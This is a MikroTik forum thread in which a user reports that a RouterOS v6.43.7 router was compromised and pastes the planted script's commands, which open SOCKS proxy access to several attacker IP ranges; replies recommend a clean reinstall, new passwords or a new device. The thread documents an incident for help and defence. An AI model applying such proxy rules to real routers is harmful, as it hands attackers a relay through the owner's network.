Community discussions

 
hsabrey
just joined
Topic Author
Posts: 18
Joined: Tue Jul 01, 2014 2:37 pm

ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 12:46 pm

hello
today i found my RB2011 been compromised using the same vulnerability and here is the photo attached.
this time they fitch a file from the internet which i do not what it is?
mean time the version is v6.43.7
the script added a file in the mikrotik and this it's content
/ip socks access add src-address=5.188.0.0/15 action=allow
/ip socks access add src-address=192.243.0.0/16 action=allow
/ip socks access add src-address=5.9.0.0/16 action=allow
/ip socks access add src-address=5.104.0.0/16 action=allow
/ip socks access add src-address=0.0.0.0/0 action=deny
in the attached photo you may see that this socks IPs are added more than 53000 times due to the script runs every 15 second.


Image
 
R1CH
Forum Veteran
Forum Veteran
Posts: 784
Joined: Sun Oct 01, 2006 11:44 pm

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 1:05 pm

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
 
Redmor
Member Candidate
Member Candidate
Posts: 233
Joined: Wed May 31, 2017 7:40 pm
Location: Italy

Re: ROS v6.43.x Hacked using same old vulnerability

Mon Feb 11, 2019 10:44 pm

Destroy RB and buy a new one.
ImageImage

Who is online

Users browsing this forum: AntonioCatte and 34 guests